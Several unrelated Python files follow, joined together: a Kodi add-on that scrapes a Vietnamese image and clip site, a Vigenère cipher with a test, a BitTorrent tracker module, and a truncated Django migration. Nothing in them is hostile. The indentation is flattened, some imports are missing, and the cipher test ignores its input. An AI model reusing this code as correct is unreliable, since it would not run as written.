import xbmcplugin
import xbmcaddon
import xbmc
import requests
from bs4 import BeautifulSoup
from lib import CMDTools
base_url = sys.argv[0]
web_name="NGAMVN.COM"
web_url = "http://www.ngamvn.com/"
def get_Web_Name():
return web_name
def get_img_thumb_url():
return CMDTools.get_path_img('resources/media/ngamvn.png')
def view():
catalogues=[{'label':'Clip','id':'/list/pl/clip/'},
{'label':'Home','id':'/list/home/'},
{'label':"\x4D\xE1\xBB\x9B\x69\x20\x6E\x68\xE1\xBA\xA5\x74".decode('utf-8'),'id':'/list/new/'},
{'label':'\x42\xC3\xAC\x6E\x68\x20\x63\x68\xE1\xBB\x8D\x6E'.decode('utf-8'),'id':'/list/vote/'},
{'label':'\xE1\xBA\xA2\x6E\x68\x20\xC4\x91\x61\x6E\x67\x20\x68\x6F\x74'.decode('utf-8'),'id':'/list/hot/'},
{'cat':'anh-vui-anh-che','label':'\xE1\xBA\xA2\x6E\x68\x20\x56\x75\x69\x20\x2D\x20\xE1\xBA\xA2\x6E\x68\x20\x43\x68\xE1\xBA\xBF'.decode('utf-8'),'id':'/list/pl/anh-vui-anh-che/'},
{'label':'\xE1\xBA\xA2\x6E\x68\x20\x47\x69\x72\x6C'.decode('utf-8'),'id':'/list/pl/anh-girl/'}]
addon_handle = int(sys.argv[1])
addon = xbmcaddon.Addon()
addonname = addon.getAddonInfo('name')
args = urlparse.parse_qs(sys.argv[2][1:])
xbmcplugin.setContent(addon_handle, 'movies')
#cat: catalog
#page: So thu tu page
#url: Dia chi trang web
cat = args.get('cat', None)
mode = args.get('mode', None)
page = args.get('page', None)
urlLink = args.get('url', None)
url=web_url
#Neu click vao link play
if urlLink != None:
response = requests.get(urlLink[0])
html = response.text
soup = BeautifulSoup(html)
imgDiv=soup.find("div", attrs = {"class":"photoImg"})
videoSrc=imgDiv.find("iframe")
if videoSrc!=None:
src=videoSrc.get("src")
id1=src.rfind('/')+1
id2=src.rfind('?')-len(src)
src=src[id1:id2]
#xbmc.log(src)
xbmc.Player().play("plugin://plugin.video.youtube/play/?video_id="+src)
else:
imgSrc=imgDiv.find("img").get("src")
xbmc.executebuiltin('ShowPicture('+web_url+imgSrc+')')
return
#Neu vao trang chon muc
if cat==None:
for c in catalogues:
li = xbmcgui.ListItem(c['label'])
urlList = CMDTools.build_url(base_url,{'web':get_Web_Name(), 'cat':c['id']})
xbmcplugin.addDirectoryItem(handle=addon_handle, url=urlList, listitem=li, isFolder=True)
return
#Load noi dung trang
else:
#Dat url trang
if page != None:
page=int(page[0])
else:
page=1
url=web_url+cat[0]+str(page)
#Load noi dung
response = requests.get(url)
html = response.text
soup = BeautifulSoup(html)
divImgs=soup.findAll("div", attrs = {"class":"pic"})
#Tao list Item
for divItem in divImgs:
#xbmc.log(divItem.encode('utf-8'))
url_Item_Link=divItem.find("a").get("href")
url_Item_Thumb=divItem.find("img", attrs = {"class":"thumb"}).get("src")
url_Item_Label=divItem.find("img", attrs = {"class":"thumb"}).get("alt")
if url_Item_Link!=None and url_Item_Thumb!=None:
if(url_Item_Thumb.startswith("http://")!=True):
url_Item_Thumb=web_url+url_Item_Thumb
li = xbmcgui.ListItem(url_Item_Label.encode('utf-8'))
li.setThumbnailImage(url_Item_Thumb)
urlList=CMDTools.build_url(base_url,{'web':web_name,'url': url_Item_Link.encode('utf-8')});
xbmcplugin.addDirectoryItem(handle=addon_handle , url=urlList, listitem=li)
#Tao nut next
li = xbmcgui.ListItem("Next")
urlList=CMDTools.build_url(base_url,{'web':web_name, 'cat':cat[0],'page': page+1});
xbmcplugin.addDirectoryItem(handle=addon_handle, url=urlList, listitem=li, isFolder=True)
|
def encrypt(text, key, alphabet):
al_len = len(alphabet)
key_len = len(key)
table = []
result = ""
for i in range(al_len):
table.append(alphabet[i:] + alphabet[:i])
for i,char in enumerate(text):
if char.lower() in alphabet:
lower = False
if char.lower() == char:
lower = True
char = char.lower()
key_char_index = i%key_len
key_char = key[key_char_index].lower()
key_index = alphabet.index(key_char)
char_index = alphabet.index(char)
new_char = table[key_index][char_index]
result += new_char if lower else new_char.upper()
else:
result += char
return result
def decrypt(text, key, alphabet):
al_len = len(alphabet)
key_len = len(key)
table = []
result = ""
for i in range(al_len):
table.append(alphabet[i:] + alphabet[:i])
for i,char in enumerate(text):
if char.lower() in alphabet:
lower = False
if char.lower() == char:
lower = True
char = char.lower()
key_char_index = i%key_len
key_char = key[key_char_index].lower()
key_index = alphabet.index(key_char)
row = table[key_index]
char_index = row.index(char)
result += alphabet[char_index] if lower else alphabet[char_index].upper()
else:
result += char
return result
def test_cipher(text, key, alphabet = "abcdefghijklmnopqrstuvwxyz"):
ciphertext = encrypt("Hello", "Hi", alphabet)
plaintext = decrypt(ciphertext, key, alphabet)
print("Got plaintext: \"{}\", encrypted it to \"{}\", then decrypted it back it \"{}\"".format(text, ciphertext, plaintext))
if __name__ == "__main__":
key = "Hi"
plaintext = "Hello"
test_cipher(plaintext, key)
|
# The contents of this file are subject to the BitTorrent Open Source License
# Version 1.1 (the License). You may not copy or use this file, in either
# source code or executable form, except in compliance with the License. You
# may obtain a copy of the License at http://www.bittorrent.com/license/.
#
# Software distributed under the License is distributed on an AS IS basis,
# WITHOUT WARRANTY OF ANY KIND, either express or implied. See the License
# for the specific language governing rights and limitations under the
# License.
# Written by Bram Cohen and John Hoffman
import sys
import os
import signal
import re
from threading import Event
from urlparse import urlparse
from traceback import print_exc
from time import time, gmtime, strftime, localtime
from random import shuffle
from types import StringType, IntType, LongType, ListType, DictType
from binascii import b2a_hex
from cStringIO import StringIO
from BitTorrent.obsoletepythonsupport import *
from BitTorrent.parseargs import parseargs, formatDefinitions
from BitTorrent.RawServer_magic import RawServer
from BitTorrent.HTTPHandler import HTTPHandler, months, weekdays
from BitTorrent.parsedir import parsedir
from BitTorrent.NatCheck import NatCheck
from BitTorrent.bencode import bencode, bdecode, Bencached
from BitTorrent.zurllib import quote, unquote
from BitTorrent import version
defaults = [
('port', 80,
_("Port to listen on.")),
('dfile', None,
_("file to store recent downloader info in")),
('bind', '',
_("ip to bind to locally")),
('socket_timeout', 15,
_("timeout for closing connections")),
('close_with_rst', 0,
_("close connections with RST and avoid the TCP TIME_WAIT state")),
('save_dfile_interval', 5 * 60,
_("seconds between saving dfile")),
('timeout_downloaders_interval', 45 * 60,
_("seconds between expiring downloaders")),
('reannounce_interval', 30 * 60,
_("seconds downloaders should wait between reannouncements")),
('response_size', 50,
_("default number of peers to send an info message to if the "
"client does not specify a number")),
('timeout_check_interval', 5,
_("time to wait between checking if any connections have timed out")),
('nat_check', 3,
_("how many times to check if a downloader is behind a NAT "
"(0 = don't check)")),
('log_nat_checks', 0,
_("whether to add entries to the log for nat-check results")),
('min_time_between_log_flushes', 3.0,
_("minimum time it must have been since the last flush to do "
"another one")),
('min_time_between_cache_refreshes', 600.0,
_("minimum time in seconds before a cache is considered stale "
"and is flushed")),
('allowed_dir', '',
_("only allow downloads for .torrents in this dir (and recursively in "
"subdirectories of directories that have no .torrent files "
"themselves). If set, torrents in this directory show up on "
"infopage/scrape whether they have peers or not")),
('parse_dir_interval', 60,
_("how often to rescan the torrent directory, in seconds")),
('allowed_controls', 0,
_("allow special keys in torrents in the allowed_dir to affect "
"tracker access")),
('hupmonitor', 0,
_("whether to reopen the log file upon receipt of HUP signal")),
('show_infopage', 1,
_("whether to display an info page when the tracker's root dir "
"is loaded")),
('infopage_redirect', '',
_("a URL to redirect the info page to")),
('show_names', 1,
_("whether to display names from allowed dir")),
('favicon', '',
_("file containing x-icon data to return when browser requests "
"favicon.ico")),
('only_local_override_ip', 2,
_("ignore the ip GET parameter from machines which aren't on "
"local network IPs (0 = never, 1 = always, 2 = ignore if NAT "
"checking is not enabled). HTTP proxy headers giving address "
"of original client are treated the same as --ip.")),
('logfile', '',
_("file to write the tracker logs, use - for stdout (default)")),
('allow_get', 0,
_("use with allowed_dir; adds a /file?hash={hash} url that "
"allows users to download the torrent file")),
('keep_dead', 0,
_("keep dead torrents after they expire (so they still show up on your "
"/scrape and web page). Only matters if allowed_dir is not set")),
('scrape_allowed', 'full',
_("scrape access allowed (can be none, specific or full)")),
('max_give', 200,
_("maximum number of peers to give with any one request")),
('max_incomplete', 100,
_("max number of outgoing incomplete connections")),
('twisted', -1,
_("Use Twisted network libraries for network connections. 1 means use twisted, 0 means do not use twisted, -1 means autodetect, and prefer twisted")),
('pid', '/var/run/bittorrent-tracker.pid',
"Path to PID file")
]
def statefiletemplate(x):
if type(x) != DictType:
raise ValueError
for cname, cinfo in x.items():
if cname == 'peers':
for y in cinfo.values(): # The 'peers' key is a dictionary of SHA hashes (torrent ids)
if type(y) != DictType: # ... for the active torrents, and each is a dictionary
raise ValueError
for peerid, info in y.items(): # ... of client ids interested in that torrent
if (len(peerid) != 20):
raise ValueError
if type(info) != DictType: # ... each of which is also a dictionary
raise ValueError # ... which has an IP, a Port, and a Bytes Left count for that client for that torrent
if type(info.get('ip', '')) != StringType:
raise ValueError
port = info.get('port')
if type(port) not in (IntType, LongType) or port < 0:
raise ValueError
left = info.get('left')
if type(left) not in (IntType, LongType) or left < 0:
raise ValueError
elif cname == 'completed':
if (type(cinfo) != DictType): # The 'completed' key is a dictionary of SHA hashes (torrent ids)
raise ValueError # ... for keeping track of the total completions per torrent
for y in cinfo.values(): # ... each torrent has an integer value
if type(y) not in (IntType,LongType):
raise ValueError # ... for the number of reported completions for that torrent
elif cname == 'allowed':
if (type(cinfo) != DictType): # a list of info_hashes and included data
raise ValueError
if x.has_key('allowed_dir_files'):
adlist = [z[1] for z in x['allowed_dir_files'].values()]
for y in cinfo.keys(): # and each should have a corresponding key here
if not y in adlist:
raise ValueError
elif cname == 'allowed_dir_files':
if (type(cinfo) != DictType): # a list of files, their attributes and info hashes
raise ValueError
dirkeys = {}
for y in cinfo.values(): # each entry should have a corresponding info_hash
if not y[1]:
continue
if not x['allowed'].has_key(y[1]):
raise ValueError
if dirkeys.has_key(y[1]): # and each should have a unique info_hash
raise ValueError
dirkeys[y[1]] = 1
alas = _("your file may exist elsewhere in the universe\nbut alas, not here\n")
def isotime(secs = None):
if secs == None:
secs = time()
return strftime('%Y-%m-%d %H:%M UTC', gmtime(secs))
http_via_filter = re.compile(' for ([0-9.]+)\Z')
def _get_forwarded_ip(headers):
if headers.has_key('http_x_forwarded_for'):
header = headers['http_x_forwarded_for']
try:
x,y = header.split(',')
except:
return header
if not is_local_ip(x):
return x
return y
if headers.has_key('http_client_ip'):
return headers['http_client_ip']
if headers.has_key('http_via'):
x = http_via_filter.search(headers['http_via'])
try:
return x.group(1)
except:
pass
if headers.has_key('http_from'):
return headers['http_from']
return None
def get_forwarded_ip(headers):
x = _get_forwarded_ip(headers)
if x is None or not is_valid_ipv4(x) or is_local_ip(x):
return None
return x
def compact_peer_info(ip, port):
try:
s = ( ''.join([chr(int(i)) for i in ip.split('.')])
+ chr((port & 0xFF00) >> 8) + chr(port & 0xFF) )
if len(s) != 6:
s = ''
except:
s = '' # not a valid IP, must be a domain name
return s
def is_valid_ipv4(ip):
a = ip.split('.')
if len(a) != 4:
return False
try:
for x in a:
chr(int(x))
return True
except:
return False
def is_local_ip(ip):
try:
v = [int(x) for x in ip.split('.')]
if v[0] == 10 or v[0] == 127 or v[:2] in ([192, 168], [169, 254]):
return 1
if v[0] == 172 and v[1] >= 16 and v[1] <= 31:
return 1
except ValueError:
return 0
class Tracker(object):
def __init__(self, config, rawserver):
self.config = config
self.response_size = config['response_size']
self.max_give = config['max_give']
self.dfile = config['dfile']
self.natcheck = config['nat_check']
favicon = config['favicon']
self.favicon = None
if favicon:
try:
h = open(favicon,'r')
self.favicon = h.read()
h.close()
except:
print _("**warning** specified favicon file -- %s -- does not exist.") % favicon
self.rawserver = rawserver
self.cached = {} # format: infohash: [[time1, l1, s1], [time2, l2, s2], [time3, l3, s3]]
self.cached_t = {} # format: infohash: [time, cache]
self.times = {}
self.state = {}
self.seedcount = {}
self.only_local_override_ip = config['only_local_override_ip']
if self.only_local_override_ip == 2:
self.only_local_override_ip = not config['nat_check']
if os.path.exists(self.dfile):
try:
h = open(self.dfile, 'rb')
ds = h.read()
h.close()
tempstate = bdecode(ds)
if not tempstate.has_key('peers'):
tempstate = {'peers': tempstate}
statefiletemplate(tempstate)
self.state = tempstate
except:
print _("**warning** statefile %s corrupt; resetting") % \
self.dfile
self.downloads = self.state.setdefault('peers', {})
self.completed = self.state.setdefault('completed', {})
self.becache = {} # format: infohash: [[l1, s1], [l2, s2], [l3, s3]]
for infohash, ds in self.downloads.items():
self.seedcount[infohash] = 0
for x,y in ds.items():
if not y.get('nat',-1):
ip = y.get('given_ip')
if not (ip and self.allow_local_override(y['ip'], ip)):
ip = y['ip']
self.natcheckOK(infohash,x,ip,y['port'],y['left'])
if not y['left']:
self.seedcount[infohash] += 1
for infohash in self.downloads:
self.times[infohash] = {}
for peerid in self.downloads[infohash]:
self.times[infohash][peerid] = 0
self.reannounce_interval = config['reannounce_interval']
self.save_dfile_interval = config['save_dfile_interval']
self.show_names = config['show_names']
rawserver.add_task(self.save_dfile, self.save_dfile_interval)
self.prevtime = time()
self.timeout_downloaders_interval = config['timeout_downloaders_interval']
rawserver.add_task(self.expire_downloaders, self.timeout_downloaders_interval)
self.logfile = None
self.log = None
if (config['logfile'] != '') and (config['logfile'] != '-'):
try:
self.logfile = config['logfile']
self.log = open(self.logfile,'a')
sys.stdout = self.log
print _("# Log Started: "), isotime()
except:
print _("**warning** could not redirect stdout to log file: "), sys.exc_info()[0]
if config['hupmonitor']:
def huphandler(signum, frame, self = self):
try:
self.log.close ()
self.log = open(self.logfile,'a')
sys.stdout = self.log
print _("# Log reopened: "), isotime()
except:
print _("**warning** could not reopen logfile")
signal.signal(signal.SIGHUP, huphandler)
self.allow_get = config['allow_get']
if config['allowed_dir'] != '':
self.allowed_dir = config['allowed_dir']
self.parse_dir_interval = config['parse_dir_interval']
self.allowed = self.state.setdefault('allowed',{})
self.allowed_dir_files = self.state.setdefault('allowed_dir_files',{})
self.allowed_dir_blocked = {}
self.parse_allowed()
else:
try:
del self.state['allowed']
except:
pass
try:
del self.state['allowed_dir_files']
except:
pass
self.allowed = None
self.uq_broken = unquote('+') != ' '
self.keep_dead = config['keep_dead']
def allow_local_override(self, ip, given_ip):
return is_valid_ipv4(given_ip) and (
not self.only_local_override_ip or is_local_ip(ip) )
def get_infopage(self):
try:
if not self.config['show_infopage']:
return (404, 'Not Found', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, alas)
red = self.config['infopage_redirect']
if red != '':
return (302, 'Found', {'Content-Type': 'text/html', 'Location': red},
'<A HREF="'+red+'">Click Here</A>')
s = StringIO()
s.write('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">\n' \
'<html><head><title>BitTorrent download info</title>\n')
if self.favicon is not None:
s.write('<link rel="shortcut icon" href="/favicon.ico">\n')
s.write('</head>\n<body>\n' \
'<h3>BitTorrent download info</h3>\n'\
'<ul>\n'
'<li><strong>tracker version:</strong> %s</li>\n' \
'<li><strong>server time:</strong> %s</li>\n' \
'</ul>\n' % (version, isotime()))
if self.allowed is not None:
if self.show_names:
names = [ (value['name'], infohash)
for infohash, value in self.allowed.iteritems()]
else:
names = [(None, infohash) for infohash in self.allowed]
else:
names = [ (None, infohash) for infohash in self.downloads]
if not names:
s.write('<p>not tracking any files yet...</p>\n')
else:
names.sort()
tn = 0
tc = 0
td = 0
tt = 0 # Total transferred
ts = 0 # Total size
nf = 0 # Number of files displayed
if self.allowed is not None and self.show_names:
s.write('<table summary="files" border="1">\n' \
'<tr><th>info hash</th><th>torrent name</th><th align="right">size</th><th align="right">complete</th><th align="right">downloading</th><th align="right">downloaded</th><th align="right">transferred</th></tr>\n')
else:
s.write('<table summary="files">\n' \
'<tr><th>info hash</th><th align="right">complete</th><th align="right">downloading</th><th align="right">downloaded</th></tr>\n')
for name, infohash in names:
l = self.downloads[infohash]
n = self.completed.get(infohash, 0)
tn = tn + n
c = self.seedcount[infohash]
tc = tc + c
d = len(l) - c
td = td + d
nf = nf + 1
if self.allowed is not None and self.show_names:
if self.allowed.has_key(infohash):
sz = self.allowed[infohash]['length'] # size
ts = ts + sz
szt = sz * n # Transferred for this torrent
tt = tt + szt
if self.allow_get == 1:
linkname = '<a href="/file?info_hash=' + quote(infohash) + '">' + name + '</a>'
else:
linkname = name
s.write('<tr><td><code>%s</code></td><td>%s</td><td align="right">%s</td><td align="right">%i</td><td align="right">%i</td><td align="right">%i</td><td align="right">%s</td></tr>\n' \
% (b2a_hex(infohash), linkname, size_format(sz), c, d, n, size_format(szt)))
else:
s.write('<tr><td><code>%s</code></td><td align="right"><code>%i</code></td><td align="right"><code>%i</code></td><td align="right"><code>%i</code></td></tr>\n' \
% (b2a_hex(infohash), c, d, n))
ttn = 0
for i in self.completed.values():
ttn = ttn + i
if self.allowed is not None and self.show_names:
s.write('<tr><td align="right" colspan="2">%i files</td><td align="right">%s</td><td align="right">%i</td><td align="right">%i</td><td align="right">%i/%i</td><td align="right">%s</td></tr>\n'
% (nf, size_format(ts), tc, td, tn, ttn, size_format(tt)))
else:
s.write('<tr><td align="right">%i files</td><td align="right">%i</td><td align="right">%i</td><td align="right">%i/%i</td></tr>\n'
% (nf, tc, td, tn, ttn))
s.write('</table>\n' \
'<ul>\n' \
'<li><em>info hash:</em> SHA1 hash of the "info" section of the metainfo (*.torrent)</li>\n' \
'<li><em>complete:</em> number of connected clients with the complete file</li>\n' \
'<li><em>downloading:</em> number of connected clients still downloading</li>\n' \
'<li><em>downloaded:</em> reported complete downloads (total: current/all)</li>\n' \
'<li><em>transferred:</em> torrent size * total downloaded (does not include partial transfers)</li>\n' \
'</ul>\n')
s.write('</body>\n' \
'</html>\n')
return (200, 'OK', {'Content-Type': 'text/html; charset=iso-8859-1'}, s.getvalue())
except:
print_exc()
return (500, 'Internal Server Error', {'Content-Type': 'text/html; charset=iso-8859-1'}, 'Server Error')
def scrapedata(self, infohash, return_name = True):
l = self.downloads[infohash]
n = self.completed.get(infohash, 0)
c = self.seedcount[infohash]
d = len(l) - c
f = {'complete': c, 'incomplete': d, 'downloaded': n}
if return_name and self.show_names and self.allowed is not None:
f['name'] = self.allowed[infohash]['name']
return (f)
def get_scrape(self, paramslist):
fs = {}
if paramslist.has_key('info_hash'):
if self.config['scrape_allowed'] not in ['specific', 'full']:
return (400, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'},
bencode({'failure reason':
_("specific scrape function is not available with this tracker.")}))
for infohash in paramslist['info_hash']:
if self.allowed is not None and infohash not in self.allowed:
continue
if infohash in self.downloads:
fs[infohash] = self.scrapedata(infohash)
else:
if self.config['scrape_allowed'] != 'full':
return (400, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'},
bencode({'failure reason':
_("full scrape function is not available with this tracker.")}))
if self.allowed is not None:
hashes = self.allowed
else:
hashes = self.downloads
for infohash in hashes:
fs[infohash] = self.scrapedata(infohash)
return (200, 'OK', {'Content-Type': 'text/plain'}, bencode({'files': fs}))
def get_file(self, infohash):
if not self.allow_get:
return (400, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'},
_("get function is not available with this tracker."))
if not self.allowed.has_key(infohash):
return (404, 'Not Found', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, alas)
fname = self.allowed[infohash]['file']
fpath = self.allowed[infohash]['path']
return (200, 'OK', {'Content-Type': 'application/x-bittorrent',
'Content-Disposition': 'attachment; filename=' + fname},
open(fpath, 'rb').read())
def check_allowed(self, infohash, paramslist):
if self.allowed is not None:
if not self.allowed.has_key(infohash):
return (200, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'},
bencode({'failure reason':
_("Requested download is not authorized for use with this tracker.")}))
if self.config['allowed_controls']:
if self.allowed[infohash].has_key('failure reason'):
return (200, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'},
bencode({'failure reason': self.allowed[infohash]['failure reason']}))
return None
def add_data(self, infohash, event, ip, paramslist):
peers = self.downloads.setdefault(infohash, {})
ts = self.times.setdefault(infohash, {})
self.completed.setdefault(infohash, 0)
self.seedcount.setdefault(infohash, 0)
def params(key, default = None, l = paramslist):
if l.has_key(key):
return l[key][0]
return default
myid = params('peer_id','')
if len(myid) != 20:
raise ValueError, 'id not of length 20'
if event not in ['started', 'completed', 'stopped', 'snooped', None]:
raise ValueError, 'invalid event'
port = int(params('port',''))
if port < 0 or port > 65535:
raise ValueError, 'invalid port'
left = int(params('left',''))
if left < 0:
raise ValueError, 'invalid amount left'
peer = peers.get(myid)
mykey = params('key')
auth = not peer or peer.get('key', -1) == mykey or peer.get('ip') == ip
gip = params('ip')
local_override = gip and self.allow_local_override(ip, gip)
if local_override:
ip1 = gip
else:
ip1 = ip
if not auth and local_override and self.only_local_override_ip:
auth = True
if params('numwant') is not None:
rsize = min(int(params('numwant')), self.max_give)
else:
rsize = self.response_size
if event == 'stopped':
if peer and auth:
self.delete_peer(infohash,myid)
elif not peer:
ts[myid] = time()
peer = {'ip': ip, 'port': port, 'left': left}
if mykey:
peer['key'] = mykey
if gip:
peer['given ip'] = gip
if port:
if not self.natcheck or (local_override and self.only_local_override_ip):
peer['nat'] = 0
self.natcheckOK(infohash,myid,ip1,port,left)
else:
NatCheck(self.connectback_result,infohash,myid,ip1,port,self.rawserver)
else:
peer['nat'] = 2**30
if event == 'completed':
self.completed[infohash] += 1
if not left:
self.seedcount[infohash] += 1
peers[myid] = peer
else:
if not auth:
return rsize # return w/o changing stats
ts[myid] = time()
if not left and peer['left']:
self.completed[infohash] += 1
self.seedcount[infohash] += 1
if not peer.get('nat', -1):
for bc in self.becache[infohash]:
bc[1][myid] = bc[0][myid]
del bc[0][myid]
if peer['left']:
peer['left'] = left
recheck = False
if ip != peer['ip']:
peer['ip'] = ip
recheck = True
if gip != peer.get('given ip'):
if gip:
peer['given ip'] = gip
elif peer.has_key('given ip'):
del peer['given ip']
if local_override:
if self.only_local_override_ip:
self.natcheckOK(infohash,myid,ip1,port,left)
else:
recheck = True
if port and self.natcheck:
if recheck:
if peer.has_key('nat'):
if not peer['nat']:
l = self.becache[infohash]
y = not peer['left']
for x in l:
del x[y][myid]
del peer['nat'] # restart NAT testing
else:
natted = peer.get('nat', -1)
if natted and natted < self.natcheck:
recheck = True
if recheck:
NatCheck(self.connectback_result,infohash,myid,ip1,port,self.rawserver)
return rsize
def peerlist(self, infohash, stopped, is_seed, return_type, rsize):
data = {} # return data
seeds = self.seedcount[infohash]
data['complete'] = seeds
data['incomplete'] = len(self.downloads[infohash]) - seeds
if ( self.allowed is not None and self.config['allowed_controls'] and
self.allowed[infohash].has_key('warning message') ):
data['warning message'] = self.allowed[infohash]['warning message']
data['interval'] = self.reannounce_interval
if stopped or not rsize: # save some bandwidth
data['peers'] = []
return data
bc = self.becache.setdefault(infohash,[[{}, {}], [{}, {}], [{}, {}]])
len_l = len(bc[0][0])
len_s = len(bc[0][1])
if not (len_l+len_s): # caches are empty!
data['peers'] = []
return data
l_get_size = int(float(rsize)*(len_l)/(len_l+len_s))
cache = self.cached.setdefault(infohash,[None,None,None])[return_type]
if cache:
if cache[0] + self.config['min_time_between_cache_refreshes'] < time():
cache = None
else:
if ( (is_seed and len(cache[1]) < rsize)
or len(cache[1]) < l_get_size or not cache[1] ):
cache = None
if not cache:
vv = [[],[],[]]
cache = [ time(),
bc[return_type][0].values()+vv[return_type],
bc[return_type][1].values() ]
shuffle(cache[1])
shuffle(cache[2])
self.cached[infohash][return_type] = cache
for rr in xrange(len(self.cached[infohash])):
if rr != return_type:
try:
self.cached[infohash][rr][1].extend(vv[rr])
except:
pass
if len(cache[1]) < l_get_size:
peerdata = cache[1]
if not is_seed:
peerdata.extend(cache[2])
cache[1] = []
cache[2] = []
else:
if not is_seed:
peerdata = cache[2][l_get_size-rsize:]
del cache[2][l_get_size-rsize:]
rsize -= len(peerdata)
else:
peerdata = []
if rsize:
peerdata.extend(cache[1][-rsize:])
del cache[1][-rsize:]
if return_type == 2:
peerdata = ''.join(peerdata)
data['peers'] = peerdata
return data
def get(self, connection, path, headers):
ip = connection.get_ip()
nip = get_forwarded_ip(headers)
if nip and not self.only_local_override_ip:
ip = nip
paramslist = {}
def params(key, default = None, l = paramslist):
if l.has_key(key):
return l[key][0]
return default
try:
(scheme, netloc, path, pars, query, fragment) = urlparse(path)
if self.uq_broken == 1:
path = path.replace('+',' ')
query = query.replace('+',' ')
path = unquote(path)[1:]
for s in query.split('&'):
if s != '':
i = s.index('=')
kw = unquote(s[:i])
paramslist.setdefault(kw, [])
paramslist[kw] += [unquote(s[i+1:])]
if path == '' or path == 'index.html':
return self.get_infopage()
if path == 'scrape':
return self.get_scrape(paramslist)
if (path == 'file'):
return self.get_file(params('info_hash'))
if path == 'favicon.ico' and self.favicon is not None:
return (200, 'OK', {'Content-Type' : 'image/x-icon'}, self.favicon)
if path != 'announce':
return (404, 'Not Found', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, alas)
# main tracker function
infohash = params('info_hash')
if not infohash:
raise ValueError, 'no info hash'
notallowed = self.check_allowed(infohash, paramslist)
if notallowed:
return notallowed
event = params('event')
rsize = self.add_data(infohash, event, ip, paramslist)
except ValueError, e:
return (400, 'Bad Request', {'Content-Type': 'text/plain'},
'you sent me garbage - ' + str(e))
if params('compact'):
return_type = 2
elif params('no_peer_id'):
return_type = 1
else:
return_type = 0
data = self.peerlist(infohash, event=='stopped', not params('left'),
return_type, rsize)
if paramslist.has_key('scrape'):
data['scrape'] = self.scrapedata(infohash, False)
return (200, 'OK', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, bencode(data))
def natcheckOK(self, infohash, peerid, ip, port, not_seed):
bc = self.becache.setdefault(infohash,[[{}, {}], [{}, {}], [{}, {}]])
bc[0][not not_seed][peerid] = Bencached(bencode({'ip': ip, 'port': port,
'peer id': peerid}))
bc[1][not not_seed][peerid] = Bencached(bencode({'ip': ip, 'port': port}))
bc[2][not not_seed][peerid] = compact_peer_info(ip, port)
def natchecklog(self, peerid, ip, port, result):
year, month, day, hour, minute, second, a, b, c = localtime(time())
print '%s - %s [%02d/%3s/%04d:%02d:%02d:%02d] "!natcheck-%s:%i" %i 0 - -' % (
ip, quote(peerid), day, months[month], year, hour, minute, second,
ip, port, result)
def connectback_result(self, result, downloadid, peerid, ip, port):
record = self.downloads.get(downloadid, {}).get(peerid)
if ( record is None
or (record['ip'] != ip and record.get('given ip') != ip)
or record['port'] != port ):
if self.config['log_nat_checks']:
self.natchecklog(peerid, ip, port, 404)
return
if self.config['log_nat_checks']:
if result:
x = 200
else:
x = 503
self.natchecklog(peerid, ip, port, x)
if not record.has_key('nat'):
record['nat'] = int(not result)
if result:
self.natcheckOK(downloadid,peerid,ip,port,record['left'])
elif result and record['nat']:
record['nat'] = 0
self.natcheckOK(downloadid,peerid,ip,port,record['left'])
elif not result:
record['nat'] += 1
def save_dfile(self):
self.rawserver.add_task(self.save_dfile, self.save_dfile_interval)
h = open(self.dfile, 'wb')
h.write(bencode(self.state))
h.close()
def parse_allowed(self):
self.rawserver.add_task(self.parse_allowed, self.parse_dir_interval)
# logging broken .torrent files would be useful but could confuse
# programs parsing log files, so errors are just ignored for now
def ignore(message):
pass
r = parsedir(self.allowed_dir, self.allowed, self.allowed_dir_files,
self.allowed_dir_blocked, ignore,include_metainfo = False)
( self.allowed, self.allowed_dir_files, self.allowed_dir_blocked,
added, garbage2 ) = r
for infohash in added:
self.downloads.setdefault(infohash, {})
self.completed.setdefault(infohash, 0)
self.seedcount.setdefault(infohash, 0)
self.state['allowed'] = self.allowed
self.state['allowed_dir_files'] = self.allowed_dir_files
def delete_peer(self, infohash, peerid):
dls = self.downloads[infohash]
peer = dls[peerid]
if not peer['left']:
self.seedcount[infohash] -= 1
if not peer.get('nat',-1):
l = self.becache[infohash]
y = not peer['left']
for x in l:
del x[y][peerid]
del self.times[infohash][peerid]
del dls[peerid]
def expire_downloaders(self):
for infohash, peertimes in self.times.items():
for myid, t in peertimes.items():
if t < self.prevtime:
self.delete_peer(infohash, myid)
self.prevtime = time()
if (self.keep_dead != 1):
for key, peers in self.downloads.items():
if len(peers) == 0 and (self.allowed is None or
key not in self.allowed):
del self.times[key]
del self.downloads[key]
del self.seedcount[key]
self.rawserver.add_task(self.expire_downloaders, self.timeout_downloaders_interval)
def track(args):
if len(args) == 0:
print formatDefinitions(defaults, 80)
return
try:
config, files = parseargs(args, defaults, 0, 0)
except ValueError, e:
print _("error: ") + str(e)
print _("run with no arguments for parameter explanations")
return
file(config['pid'], 'w').write(str(os.getpid()))
r = RawServer(Event(), config)
t = Tracker(config, r)
s = r.create_serversocket(config['port'], config['bind'], True)
r.start_listening(s, HTTPHandler(t.get, config['min_time_between_log_flushes']))
r.listen_forever()
t.save_dfile()
print _("# Shutting down: ") + isotime()
def size_format(s):
if (s < 1024):
r = str(s) + 'B'
elif (s < 1048576):
r = str(int(s/1024)) + 'KiB'
elif (s < 1073741824):
r = str(int(s/1048576)) + 'MiB'
elif (s < 1099511627776):
r = str(int((s/1073741824.0)*100.0)/100.0) + 'GiB'
else:
r = str(int((s/1099511627776.0)*100.0)/100.0) + 'TiB'
return(r)
|
# Generated by Django 2.0.7 on 2018-08-01 12:00
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
import picker.models
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('picker', '0002_auto_20160720_0917'),
]
operations = [
migrations.CreateModel(
name='PickerFavorite',
fields=[
